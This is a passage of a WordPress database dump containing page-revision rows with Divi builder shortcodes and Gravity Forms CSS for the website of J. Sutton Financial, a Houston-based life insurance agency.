button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\" custom_margin=\"||10px|||\"][/dsm_button][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"112px|||||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-04 00:14:24','2023-04-04 00:14:24','',138,'http://cmdev-site1.com/?p=748',0,'revision','',0),(749,1,'2023-04-04 00:16:59','2023-04-04 00:16:59','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" min_height=\"700px\" custom_margin=\"||9px|||\" custom_padding=\"23px||62px|||\" hover_transition_speed_curve=\"ease-out\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" hover_enabled=\"0\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\" sticky_enabled=\"0\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_menu active_link_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" module_alignment=\"left\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" hover_enabled=\"0\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\" menu_font=\"||||||||\" background_layout=\"dark\" module_class=\"menu\" sticky_enabled=\"0\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"]<h1><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url,button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section]','Default Website Template','','inherit','closed','closed','','528-revision-v1','','','2023-04-04 00:16:59','2023-04-04 00:16:59','',528,'http://cmdev-site1.com/?p=749',0,'revision','',0),(750,1,'2023-04-04 00:16:59','2023-04-04 00:16:59','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" width=\"100%\" max_width=\"100%\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" custom_margin=\"||10px|||\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"112px|||||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-04 00:16:59','2023-04-04 00:16:59','',138,'http://cmdev-site1.com/?p=750',0,'revision','',0),(751,1,'2023-04-04 00:17:27','2023-04-04 00:17:27','.menu a:hover, #menu a:hover {color: #003372;}\r\n\r\n.gform_wrapper.tc_wrapper {\r\n    width: 800px;\r\n    margin: 0 auto;\r\n    background: #fff;\r\n    padding: 30px;\r\n    border: 1px solid rgba(0,0,0,.1);\r\n    border-radius: 8px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_heading {\r\n    display: none;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper h3 {\r\n    padding: 0;\r\n    font-weight: 700;\r\n    text-align: center;\r\n    color: #000;\r\n    font-size: 26px;\r\n    margin-bottom: 30px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box {\r\n    display: grid;\r\n    grid-template-columns: 5fr 7fr;\r\n    column-gap: 40px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box .gfield_description {\r\n    padding: 0;\r\n    font-size: 13px;\r\n    color: #000;\r\n    line-height: 18px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box .gfield_label, .gform_wrapper.tc_wrapper .gfield.two_box .validation_message {\r\n    grid-column: 1/-1;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper input[type=text], .gform_wrapper.tc_wrapper input[type=email], .gform_wrapper.tc_wrapper input[type=tel], .gform_wrapper.tc_wrapper input[type=number] {\r\n    border: 1px solid #999;\r\n    outline: none;\r\n    border-radius: 5px;\r\n    padding: 12px 15px;\r\n    font-size: 15px !important;\r\n    transition: 0.3s;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper input[type=text]:focus, .gform_wrapper.tc_wrapper input[type=email]:focus, .gform_wrapper.tc_wrapper input[type=tel]:focus, .gform_wrapper.tc_wrapper input[type=number]:focus {\r\n    border-color: #333;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper input[type=number]::-webkit-outer-spin-button, .gform_wrapper.tc_wrapper input[type=number]::-webkit-inner-spin-button {\r\n    -webkit-appearance: none;\r\n    -moz-appearance: textfield;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield .gfield_label {\r\n    font-weight: 600;\r\n    color: #000;\r\n    font-size: 14px;\r\n    margin: 0;\r\n    max-width: 40%;\r\n    line-height: 18px;\r\n    margin-bottom: 5px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio .gchoice input[type=radio] {\r\n    display: none;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio {\r\n    display: grid;\r\n    grid-template-columns: 1fr 1fr;\r\n    gap: 16px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio label {\r\n    width: 100%;\r\n    max-width: 100%;\r\n    border: 1px solid #666;\r\n    text-align: center;\r\n    color: #333;\r\n    padding: 10px;\r\n    border-radius: 5px;\r\n    cursor: pointer;\r\n    transition: 0.3s;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio input:checked + label {\r\n    background: #e3e1e1;\r\n    color: #000;\r\n    border-color: #000;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label {\r\n    padding: 0;\r\n    margin: 40px 0 0 0;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label input[type=submit] {\r\n    margin: 0;\r\n    padding: 12px 50px;\r\n    border: 1px solid #000;\r\n    background: #000;\r\n    border-radius: 5px;\r\n    color: #fff;\r\n    font-size: 16px;\r\n    text-transform: uppercase;\r\n    font-weight: 600;\r\n    transition: 0.3s;\r\n    cursor: pointer;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label input[type=submit]:hover {\r\n    background: #333;\r\n}\r\n\r\n\r\n.gform_wrapper.tc_wrapper .gform_validation_errors {\r\n    display: none;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield_error .validation_message {\r\n    border: none;\r\n    background: transparent;\r\n    color: #C02B0A !important;\r\n    margin-top: 5px;\r\n    padding: 0;\r\n    font-size: 14px;\r\n}\r\np.qut {\r\n    font-size: 24px;\r\n    color: #000;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.q_btn .gfield_label {\r\n    width: auto;\r\n    font-size: 18px;\r\n    max-width: max-content;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.q_btn input {\r\n    border: none;\r\n    padding: 0;\r\n    font-size: 18px !important;\r\n    font-weight: 700;\r\n    color: #000;\r\n    width: max-content;\r\n    max-width: max-content;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.q_btn .ginput_container {\r\n    max-width: max-content;\r\n    display: inline-block;\r\n    margin-left: 10px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label {\r\n    display: none !important;\r\n}\r\n\r\n\r\n@media only screen and (max-width: 767px) { \r\n	\r\n.gform_wrapper.tc_wrapper {\r\n    width: 100%;\r\n    padding: 18px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper h3 {\r\n    font-size: 18px;\r\n    margin-bottom: 20px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box {\r\n    grid-template-columns: 1fr;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box .gfield_description {\r\n    margin-top: 15px;\r\n}\r\n.gform_wrapper.tc_wrapper input[type=text], .gform_wrapper.tc_wrapper input[type=email], .gform_wrapper.tc_wrapper input[type=tel], .gform_wrapper.tc_wrapper input[type=number] {\r\n    padding: 6px 15px;\r\n}\r\n.gform_wrapper.tc_wrapper .gfield .gfield_label {\r\n    max-width: 100%;\r\n}','Divi','','inherit','closed','closed','','35-revision-v1','','','2023-04-04 00:17:27','2023-04-04 00:17:27','',35,'http://cmdev-site1.com/?p=751',0,'revision','',0),(752,1,'2023-04-04 00:21:48','2023-04-04 00:21:48','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" min_height=\"700px\" custom_margin=\"||9px|||\" custom_padding=\"23px||62px|||\" hover_transition_speed_curve=\"ease-out\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_menu active_link_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" module_class=\"menu\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font=\"||||||||\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" background_layout=\"dark\" module_alignment=\"left\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" hover_enabled=\"0\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\" sticky_enabled=\"0\" active_link_color__hover_enabled=\"on|hover\" active_link_color__hover=\"#003372\" menu_text_color__hover_enabled=\"on|hover\" menu_text_color__hover=\"#003372\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"]<h1><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url,button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section]','Default Website Template','','inherit','closed','closed','','528-revision-v1','','','2023-04-04 00:21:48','2023-04-04 00:21:48','',528,'http://cmdev-site1.com/?p=752',0,'revision','',0),(754,1,'2023-04-04 00:24:52','2023-04-04 00:24:52','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" min_height=\"700px\" custom_margin=\"||9px|||\" custom_padding=\"23px||62px|||\" hover_transition_speed_curve=\"ease-out\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" hover_enabled=\"0\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\" sticky_enabled=\"0\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_menu active_link_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" module_class=\"menu\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font=\"||||||||\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" background_layout=\"dark\" module_alignment=\"left\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" hover_enabled=\"0\" global_colors_info=\"{}\" active_link_color__hover_enabled=\"on|hover\" active_link_color__hover=\"#003372\" menu_text_color__hover_enabled=\"on|hover\" menu_text_color__hover=\"#003372\" theme_builder_area=\"et_header_layout\" sticky_enabled=\"0\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"]<h1><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url,button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section]','Default Website Template','','inherit','closed','closed','','528-revision-v1','','','2023-04-04 00:24:52','2023-04-04 00:24:52','',528,'http://cmdev-site1.com/?p=754',0,'revision','',0),(755,1,'2023-04-04 00:27:42','2023-04-04 00:27:42','.gform_wrapper.gravity-theme .gform_footer button, .gform_wrapper.gravity-theme .gform_footer input {color: #FFFFFF!important;\r\n    border-width: 0px!important;\r\n    border-color: RGBA(255,255,255,0);\r\n    border-radius: 14px;\r\n    font-size: 20px;\r\n    background-color: #003372;\r\n}\r\n.gform_wrapper.tc_wrapper {\r\n    width: 800px;\r\n    margin: 0 auto;\r\n    background: #fff;\r\n    padding: 30px;\r\n    border: 1px solid rgba(0,0,0,.1);\r\n    border-radius: 8px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_heading {\r\n    display: none;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper h3 {\r\n    padding: 0;\r\n    font-weight: 700;\r\n    text-align: center;\r\n    color: #000;\r\n    font-size: 26px;\r\n    margin-bottom: 30px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box {\r\n    display: grid;\r\n    grid-template-columns: 5fr 7fr;\r\n    column-gap: 40px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box .gfield_description {\r\n    